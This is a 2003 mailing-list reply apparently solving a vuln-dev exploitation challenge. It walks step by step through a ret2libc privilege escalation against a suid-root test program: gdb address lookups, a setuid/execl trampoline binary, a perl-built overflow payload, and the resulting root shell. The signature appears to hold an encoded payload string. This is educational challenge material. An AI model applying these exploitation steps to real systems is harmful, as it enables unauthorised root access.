Re: [Vuln-dev Challenge] Challenge #2

[Jose Ronnick <matrix () phiral com>]

On Sat, 24 May 2003 13:11:13 +0200
spacewalker <spacewalker () 0xbadc0de be> wrote:

> 0wn3d. Ret into libc exploitation, no setuid() stuff, quite simple in
> fact.
>
> The challenge would have been interesting if the fopen() wasn't "a" but
> create and write from beginning.
>
> $ ./exploit 
> Using system address 0x4005f531
> And overwriting printf got at 0x0804971c starting by 0x08049713
> sh-2.05b$ exit
> exit
> Segmentation fault
>
> default offset is 5 (could vary).
> spacewalker
>               /* Say NO to target[n] exploits ! */

I agree about using ret2libc... this one was easy enough you shouldn't have used shellcode..   =)  however...  you 
forget that system() executes through /bin/sh which will drop privs.  Try making the vuln program suidroot and then run 
your exploit...  still no root shell.  =/   close.. but it really doesn't give you much more since you already had a 
basic user shell before you executed the sploit..  

Here's one way to do it using ret2libc to avoid the privilege dropping..  (same as the encrypted post earlier, 
plaintext now since the cat's outta the bag anyways)..  There's also a way to do with without building a trampoline 
prog to bounce off of.. just chaining libc calls...  If no one else posts a solution doing it, I'll do it an post it 
later...

matrix@overdose vuln-dev $ gcc -o vuln2 vulndev2.c 
matrix@overdose vuln-dev $ sudo chown root.root vuln2
matrix@overdose vuln-dev $ sudo chmod +s vuln2
matrix@overdose vuln-dev $ echo 'main(){sleep();execl();}' > e.c;gcc -o e.x e.c;gdb -q e.x; rm e.*
(gdb) break main
Breakpoint 1 at 0x804836e
(gdb) run
Starting program: /home/matrix/research/vuln-dev/e.x 

Breakpoint 1, 0x0804836e in main ()
(gdb) p sleep
$1 = {<text variable, no debug info>} 0x400ce760 <sleep>
(gdb) p execl
$2 = {<text variable, no debug info>} 0x400cecc0 <execl>
(gdb) quit
The program is running.  Exit anyway? (y or n) y
matrix@overdose vuln-dev $ objdump -R vuln2 | grep exit
0804974c R_386_JUMP_SLOT   exit
matrix@overdose vuln-dev $ echo 'main(){setuid(0);setgid(0);execl("/bin/sh","/bin/sh",0);}' > t.c;gcc -o t.ramp t.c;
matrix@overdose vuln-dev $ pwd   
/home/matrix/research/vuln-dev
matrix@overdose vuln-dev $ printf "\x60\xe7\x0c\x40/home/matrix/research/vuln-dev/t.ramp\x00" > db.log
matrix@overdose vuln-dev $ ./vuln2 `perl -e 'print "\x4c\x97\x04\x08"x31 . "\xc0\xec\x0c\x40" . "\x50\x97\x04\x08"x3;'` 
h
`ç
  @/home/matrix/research/vuln-dev/t.ramp
root@overdose vuln-dev # id
uid=0(root) gid=0(root) groups=100(users),10(wheel),18(audio),250(portage)
root@overdose vuln-dev # 

-- 
%JOSE_RONNICK%50,:-dddd-0EEb-pVVyP\-1111-jjjj-yNNN-_4HUP-qq0q-02%r-_Z%JP-%Iwp-5kyyP-n5nn-aTTa-1271P-4ttt-/888-3tSMP-bbnb-L8wL-kMwgP-3Hy3-rqzWP-m%m8-h4x--v%r5P-S7S7-g7g7-F2u2PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP

Attachment: _bin
Description: